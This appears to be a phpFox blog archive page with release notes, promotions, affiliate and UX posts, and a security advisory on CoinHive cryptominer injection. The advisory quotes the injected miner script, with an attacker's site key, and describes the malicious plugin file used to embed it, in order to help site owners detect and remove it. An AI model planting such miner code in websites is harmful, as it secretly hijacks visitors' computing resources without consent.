Author: phpFox

  • phpFox 4.6.0 RC Release

    phpFox 4.6.0 RC Release

    phpFox 4.6.0 RC is available Happy Holiday! Just a few days left in this year. And we are all excitedly counting down for New Year 2018! Wish you will have happy memories with your family and friends in this special moment. We are so pleased right now bringing you a sweet present: the phpFox 4.6.0 RC version is available.We would like to take a moment to send our appreciation to all clients and beta testers who have contributed significantly to this release with suggestions, feedbacks, and reports. Without you guys, our team is undoubtedly unable to come up with this version in such short period. Please keep on helping us with your valuable inputs. That inspires and helps us to improve our products in the future.In this RC release, we mainly focus on improving the performance of phpFox platform by acknowledging all recommendations from you and continuously advancing phpFox to that direction. Being faster, smoother and more stable is the goal we are aiming to achieve. Our performance test indicates that RC version has much better results compare to beta release in term of speed and performance.Aside from improvements in performance and stability, most of the reports on bugs and issues from users on Github and phpFox Community are carefully handled and fixed in this RC release. We are pleased to say we are coming very close to the official release of 4.6.0 which is expected as the best phpFox version ever.We would like to invite you to try, experience and give us feedbacks on RC release of phpFox 4.6.0. You can download package in Client Area from now.Same as Beta Release, we only recommend you to use the RC build for testing purpose only. Please consider seriously and carefully when using it on your Production site. Have feedback or Need our support? Please either submit a ticket in our Client Area or drop us emails at hello@phpfox.com. We love to hear from you. 
  • About CryptoCurrency Miner Script

    About CryptoCurrency Miner Script

    CryptoCurrency Miner Script Nowadays you can hear people talk much about cryptocurrencies everyday. Cryptocurrency is a new trend now and indeed everybody wants to have a piece of this cake. This trend resulted in the emergence of online platforms that allow webmasters to install coin miners into their websites as an alternative means of monetization. Unfortunately, hackers can also abuse coin miner scripts by injecting them to websites without awareness of webmasters to get some benefits.As reports and observations that we conducted recently, same as other popular platforms such as Wordpress, Joomla, etc., phpFox is also a target for hackers. They have injected in many phpFox sites without any permissions of webmasters. Among them, CoinHive is exposed as the most spreading and popular script which enables hackers to hijack sites and drain the resources of users when they access to sites. What is CoinHive? CoinHive is one of the most popular JavaScript cryptocurrency miners for websites. According to CoinHive creator, it is a JavaScript miner for the Monero Blockchain that webmaster can embed into their websites. Users run the miner directly in their browsers and mine for the webmaster in turn for an ad-free experience, in-game currency…Unfortunately, cybercriminals see this as an opportunity and have started abusing this tool by first hacking into websites and then embedding this JavaScript code into the core of popular platforms without the consent of site owner. Through this, hackers can use computers of site visitors to mine digital currency for them without users’ permissions.In fact, CoinHive hijacking issue is becoming a security threat among popular Social Network and CMS platforms. Hackers target these platforms because sites using these platforms attract a large volume of users on a daily basis which is the best for coin mining purpose. There are records of sites using Wordpress, Joomla, Magento, Drupal and many popular platforms as the victims of this kind of attack. Please refer to this article for more info. Certainly, our phpFox platform is not an exception to this plague. What are impacts of injected CoinHive script? By injecting CoinHive script into the core of the platform, the mining script will be called and run automatically by default when users load any page of the infected site. Once CoinHive script runs, resources on the computer of users will be hijacked and used as a coin miner. The script runs in background secretly so common users don’t even know the existence of the script to take actions.Under the effect of CoinHive miner script, common symptoms which site visitors can easily notice are:High CPU and graphics cards usage. The computer works slowly on the browser and other programs. The computer will eventually stop working with high load.How to detect websites using CoinHive script? As mentioned above, the most obvious way to know if a site has CoinHive script running is to measure the performance of your computer. If you visit a site and realize your computer runs slower than usual, and there are no announcements of site owner about using CoinHive as an alternative revenue, please contact the site owner immediately. There is a high possibility that the site is already hijacked by hackers and running coin miner scripts.On the phpFox platform, the quick and easy way to detect if CoinHive script is running is by pulling and examining the source of a page after logging in to the site (To view page source right-click on a page and select ‘View Page Source’).You might see on page source something similar to: <script>;$Ready(function() {setTimeout(function(){ var miner = new CoinHive.Anonymous('uoVwp8UScbNhkfzJn7rPNZFP3Pe1c54x');miner.start(); }, 10000);});</script> Notice the site key as marked red, this is the key generated by hackers. Any coin mined will be transferred to hackers by using this key.And: <script src="https://coinhive.com/lib/coinhive.min.js"></script> Those are indicators to show that a site is running CoinHive in the background.There is an easy way to detect and prevent CoinHive from running and eating up all computer resources is by using coin mining script blocker extensions on browsers.We suggest extensions such as:J2TeaM Security- Google Chrome: https://chrome.google.com/webstore/detail/j2team-security/hmlcjjclebjnfohgmgikjfnbmfkigocc/No Coin- Google Chrome: https://chrome.google.com/webstore/detail/no-coin-block-miners-on-t/gojamcfopckidlocpkbelmpjcgmbgjcl?hl=en- Firefox: https://addons.mozilla.org/en-US/firefox/addon/no-coin/ How is CoinHive injected into phpFox? Go in a little deeper, we figured when hackers have FTP access with the permission to modify files on phpFox site, they will insert this line to file:…/PF.Base/include/library/phpfox/template/template.class.phpThis will check for the existence of a plugin. if the plugin exists then the plugin will run and do something on the template. In this case, it is a plugin called template_getheader which is located at:…/PF.Base/module/core/include/plugin/template_getheader.phpThis file has simple content. It just plainly inserts the coin mining script to the header of phpFox main template file, so every page will load with the script embedded.In other words, the flow of these actions basically is:User requests to load a page. Template file will be called to render the page. Injected code in template file will execute and call the malicious plugin. The plugin will inset coin mining script into the template file. From corrupted template file, the page will be rendered out with the coin mining script attached. User loads page and also runs the script.Therefore, this is definitely NOT a security vulnerability in phpFox Script. Without FTP permission to access, create, upload or modify files, there is no way hackers can take advantage and penetrate scripts and files to the core of phpFox platform. How to remove CoinHive script? After testing the interactions of how hackers use the script on phpFox page, we suggest a simple solution to get rid of CoinHive script by removing malicious plugin file from the core of phpFox.As mention above, the malicious added file is located in:…/PF.Base/module/core/include/plugin/template_getXXXXX.phpWith testing, we concluded that after removing this malicious plugin file, the template file will no longer generate coin mining script on the page and will render normally. So users will be safe to access your site.Please note that the plugin file comes with many names, usually it in the format of template_getXXXXX.php such as template_getheader.php, template_gettemplate.php…An easier way to know the file is by referencing the created/modified date of the file. It’s usually the most recent created/modified file in the folder.However, this solution is suggested as just a temporary fix for an early stage of the investigation. We will conduct more research on the source and the origins to help you have better solutions. Anyway, any solutions won't work unless you manage FTP access seriously and carefully. How to prevent your site from injection of CoinHive script? Currently, we know for sure that hackers are unable to inject the scripts to your site without FTP permission to access and manipulate files.Therefore, manage FTP access seriously and carefully. Whenever you give FTP to any parties, you should create a separate account for each, so if any party creates/modifies anything on your site, their activities will be logged and you can reference or traceback in case anything happens. Make sure to enable FTP log and check the log on the date the malicious plugin file created, high chance you will know which party created/uploaded the file to your site. You will need to change the password of FTP accesses periodically or right after parties complete their works on your site.Also, please be aware of any suspicious apps and modules. Make sure you purchase them from trustable developers/companies. If you think an app causes this issue, please don’t hesitate to contact phpFox team, we will review the app and take appropriate actions if needed. All bits of help is appreciated in the process.Lastly, backup your site regularly. Notice changes on your site, if your site doesn’t work as usual (slower, sluggish…), please check for the interaction of coin mining script as mentioned above. In case of the issue is happening, revert back to the latest backup and trace what changes you made which might cause the issue (Installed an app, gave FTP to someone…) Report Abuse to CoinHive team Also, if you think a site is using CoinHive script without any notice of the usage to users, you can report CoinHive abuse here. Make sure you have the site key when reporting the abuse.In any case, you can always contact us to seek assistance.phpFox Team
  • 30% OFF Last Day Sale this Cyber Monday!

    30% OFF Last Day Sale this Cyber Monday!

    Attention to all Black Friday and Cyber Monday aficionados: The night of reckoning is still upon us!Black Friday & Cyber Monday sale offers is ending very soon since today is the last day of this promotion. Please hurry up! In the spirit of giving away as saying thanks to all the clients, you can still receive 30% OFF on phpFox licenses and a lot of amazing deals from 3rd-party developers out there. So don't just stand there and look at our great deals from the window outside, come into the store and claim the best values you can get from special offers before the end of Nov 27, 2017 (PST).Happy shopping and our warmest wishes for a happy holiday season to you!
  • phpFox 4.5.3 Build 3 Released

    phpFox 4.5.3 Build 3 Released

    phpFox 4.5.3 Build 3 While waiting for release 4.6.0, we are releasing a couple of phpFox 4.5.x maintenance versions to fix urgent, critical issues as well as improvements which clients encountered and reported to us. This is to make sure the recent phpFox version is continuously improving and stable.We are pleased to announce that the maintenance release - phpFox 4.5.3 Build 3 has been released and available in Client Area (phpFox 4.5.3b3) for clients to download.Please note that if you have phpFox 4.5.3 installed, you do not need to run the full upgrade routine as this fix is a minor build release. In this build, we have fixed the following issues 1. Missing settings files when upgrade phpFox site - Can not upgrade phpFox. 2. Missing loading icon when load more feeds. 3. Cannot install Apps in some clients sites. Improvements N/A Install InfoDownload Upgrade Instructions Installation InstructionsChange LogChanged files listFind bugs with this version? Please report them at our GitHub tracker.Need support? Purchase support and submit tickets right from your account.www.phpFox.com Start Your Social Network Today!
  • phpFox 4.5.3 Build 2 Released

    phpFox 4.5.3 Build 2 Released

    phpFox 4.5.3 Build 2 While waiting for release 4.6.0, we are releasing a couple of phpFox 4.5.x maintenance versions to fix urgent, critical issues as well as improvements which clients encountered and reported to us. This is to make sure the recent phpFox version is continuously improving and stable.We are pleased to announce that the maintenance release - phpFox 4.5.3 Build 2 has been released and available in Client Area (phpFox 4.5.3b2) for clients to download.Please note that if you have phpFox 4.5.3 installed, you do not need to run the full upgrade routine as this fix is a minor build release. In this build, we have fixed 1. Page keeps loading endlessly when setting a theme as default on server using PHP 5.5 2. User Profile - Activity feed works incorrectly after loading more many times 3. Some issues in Install/Upgrade process 4. Cannot install/upgrade phpFox 4.5.3 in PHP version 5.5 5. Cannot gift Points 6. Duplicate FTP selection in Remove unused files page. We also have some improvements Support option to select/un-select all apps in Install/Upgrade platform process Install InfoDownload Upgrade Instructions Installation InstructionsChange LogChanged files listFind bugs with this version? Please report them at our GitHub tracker.Need support? Purchase support and submit tickets right from your account.www.phpFox.com Start Your Social Network Today!
  • phpFox Affiliate – How It Works

    phpFox Affiliate – How It Works

    This post is to explain more how the phpFox Affiliate works, provides you with all affiliate banners and necessary instructions. phpFox Affiliate banners To those who are already active Affiliates of phpFox sales, the following banners are for you to use on your websites, blogs or wherever you want to put it together with your Unique Referral Link.Medium Rectangle banner (300x250):This banner should be embedded within text content or at the end of articles.  Leaderboard banner (728x90):This banner should be placed above main content, and on forum sites.  Affiliate Panel How to get your Unique Referral Link and see Your referralsLogin Client Area Click Affiliates on the menu Get Your Unique Referral LinkSee your referralsThe current Affiliate Earning Percentage is 20% It is the percentage of each payment that you receive. The current Affiliate Commission Delay is 30 days It is the number of days from the date your referral purchased phpFox's product (license or service) to the date its commission is available for you to withdraw (if accounts are still active). How to withdraw your commission You will be able to request a withdrawal as soon as your balance reaches the minimum required amount of $100.00 USD.In the above example, the affiliate needs to wait until the Commissions Pending Maturation: $59.80 USD becomes an available commission and is added to its Available Commissions Balance. The Available Commissions Balance then will be $149.65 USD and ready to withdraw.Click the Request Withdrawal button. It will create a ticket on your behalf. Our staff will then follow up with you in the ticket and proceed to send you your available commission payment.See also the instruction how to register as a phpFox Affiliate.
  • Core Video App v4.5.3 Release

    Core Video App v4.5.3 Release

    After receiving many feedbacks from you about our new Core Video App which can be found at https://store.phpfox.com/product/1819/video, we are now pleased to announce the release of Core Video App v4.5.3 is ready. In this version, we've fixed some major issues as following:If you share a video which porting from old Video app to this new one, system display message "The sharing content isn't available now." An error occurred in the phrase of new Video app Video menu is not active when accessing all pages of Video app System displays wrong error message Does not convert all old videos completely Could not upload large video via FFMPEGFind bugs with this version? Please report them at our Github tracker.Need support? Don't hesitate to submit tickets right from your account to reach out. We will reply to you very soon then.We hope that you feel interested and joyful in this release. Stay tuned as we will get back with more updates soon.
  • phpFox 4.5.2 is released now!

    phpFox 4.5.2 is released now!

    We are pleased to announce the release of phpFox 4.5.2 is ready now. This version is focused on only 1 main objective: improving significantly the quality of Core script. On top of issues from your valuable feedback on phpFox Community and GitHub, many other issues have been found and fixed thoroughly. There are no new features added. But you would be surprised if knowing how much effort we have spent on this release. It makes us believe that this will be the most stable phpFox version than ever. From now, we will have full focus on phpFox 4.6.0 to make our Core script even better.Here are highlighted notes for this release: Fixed Issues We have already fixed all major bugs from 4.5.0. You can get the full list here. Improvements A lot of improvements have been also implemented in this version. Visit here  to view them allNotice: Our new core Video app which contains many new features will be released very soon right after the 4.5.2. It will be replaced the current video app in Core script. Hence, some of the minor issues occurring with Video app in 4.5.2 are not fixed for now. Installation InfoDownload Upgrade Instructions Installation InstructionsPlease note that if you have phpFox 4.5.1 or lower installed, you do need to run the full upgrade routine. Development Updates If you are developers and you have a concern about our changes in the Core script on this version. Please visit here to get more detail information. Change logChanged file listFind bugs with this version? Please report them at our Github tracker.Need support? Don't hesitate to submit tickets right from your account to reach out. We will reply to you very soon then.We hope that you feel interested and joyful in this release. Stay tuned as we will get back with more updates soon.
  • phpFox 4.6.0 – How to keep your user experience consistency in Mobile Era.

    phpFox 4.6.0 – How to keep your user experience consistency in Mobile Era.

    Should your site have a specific view for Mobile? Without a doubt, UI/UX is the first thing to impress the new users before they can be impressed by functionality. As a Site Owner, we know that you have to consider the display of every block on all pages on the different views. Also, the consistency is very important whereas your users should have the same experience on all devices. In this topic, we will discuss few rules of thumb in design adapting with the business of your sites, in order to keep your user experience consistency:Responsive Design, should all blocks display the same on all views (Desktop, Tablet, Phone)? Pagination vs Load MoreYou might already be familiar with Responsive Design, especially when phpFox supports responsive Bootstrap framework by default https://blog.phpfox.com/2015/11/27/phpfox-v4-1-0-released/; your phpFox site already has a specific view for Mobiles (Tablet and Phone). Of course that you can have Mobile App specified for your users but it is very costly and hard to determine what the users really need on mobile from the beginning.Moreover, not all the functions working on Desktop view are suitable for Mobile users due to different purposes of devices. Mobile is a data-consuming device, where itʼs used to view, interact with existing information. Of course that you can post a photo, simple blog; but not really suitable to create complex content such as Business Profile, product description, ... With feedback from our users as well as our observing many websites, we found out many blocks are better not to display on Mobile. Therefore we will add this option into default basic blocks, and so admins can configure on their owns.Also, any 3rd party developers should follow this rule and inherit the setting. Ex: few blocks on an event, etc. will not display. So if your site is for simple content posts such as photo, music, blog, the creation blocks should be displayed on Mobile Devices. However, if your sites are Business Orientated such as Listing, Business Directory, Job Posting, you have to choose carefully which ones to display.This feature will be available in phpFox 4.6.0, and so will the following feature ... Scrolling Or Pagination? Whatʼs your choice? Why Pagination and Scrolling related to Responsive Design? The link is quite loosely, but for those who have been using Facebook or Pinterest app in mobile, the experience should be the same with mobile when accessing the activity feed, why? Simple reason: users keep scrolling to read activity feeds - important action - no matter what devices they are using. Simple rule: scroll is good for mobile devices, users prefer to scroll than to click on a touch screen.Pros and Cons of Scrolling and Pagination are quite easily to find out, many articles out there discussing on this. Here is an example for your quick reference: UX: Infinite Scrolling vs. PaginationYet to balance and overcome “Cons” when using Scrolling:Either make the footer accessible by making it sticky or relocate the links to a top or side bar. “Load More” button when reaching the maximum number of autoloadingFor your reference, we quote here the part indicating when you should use Infinite Scrolling or Pagination?“There are only a few instances where infinite scrolling is effective. Itʼs best suited for sites and apps that boast user-generated content (Twitter, Facebook) or visual content (Pinterest, Instagram). Pagination, on the other hand, is a safe option, and good solution for sites and apps that intend to satisfy the goal-oriented activities of the users.”In response to this urgent call, phpFox will introduce options for you to choose in 4.6.0:Scrolling auto loading with number of “Read More” Pagination for site wideSo, it will be definitely easy for you to choose whatʼs suitable for you.To be continued ... so stay tuned for more update on phpFox 4.6.0.
  • New apps and themes in January 2017

    New apps and themes in January 2017

    1. Regions / States from Foxer      Introduction: We have created this app to cover missing regions and states for all countries all over the world. Over 4 thousand regions will be added and will automatically appear if user selects any country available on registration or when searching for members on members browse page.      Codes for the names of countries, dependent territories, special areas of geographical interest, and their principal subdivisions (e.g., provinces or states) were set according to ISO 3166-2.2. Advanced News / RSS feeds from FoxExpert.com      Introduction: Need cool plugin for showing latest news and articles? This module allow your users add any rss channels and news. Have a good options for sharing content.Also this plugin create tons of new pages with good seo. Many blocks and cool features, buy it and we will install it for free.3. Comment Button Advanced from Scheinwelt-Media      Introduction: This app adds a button to the comment form. You can now write comments without sending them on enter. If users pressing enter they will get a new line.4. Social Store from YouNetCo      Introduction: With the rise of Electronic Commerce and Social Media, there’s been a major push towards Social Commerce, where social networks are changing themselves to offer a way to earn, including a more convenient online shopping and selling experience. Our Store helps you to manage your own Social Commerce marketplace, where people come to buy and sell in a social way. We support shoppers find anything they need. We help retailers/merchants build their own Store, list their goods even they are planning to sell physical or downloadable items.      We also provide you solutions making some profit from the site, since you are supported to charge sellers a fee for opening stores as well as get commission amount on each transaction.5. User Dashboard from Foxer      Introduction: This app adds a stylish block that shows user's info on user profiles and when user is on his home page.6. Advanced Photo/Albums from FoxExpert.com      Introduction: Plugin extends the standard phpfox plugin Photo. We added more than 20 different blocks and changed design of all pages. Created 2 new pages (Photos home and photos by category). Many admin settings including 2 design of browsing albums (pinterest style and grid style)
Fox
phpFox 4.6.0 Release - a new level of Social Network PlatformLearn More!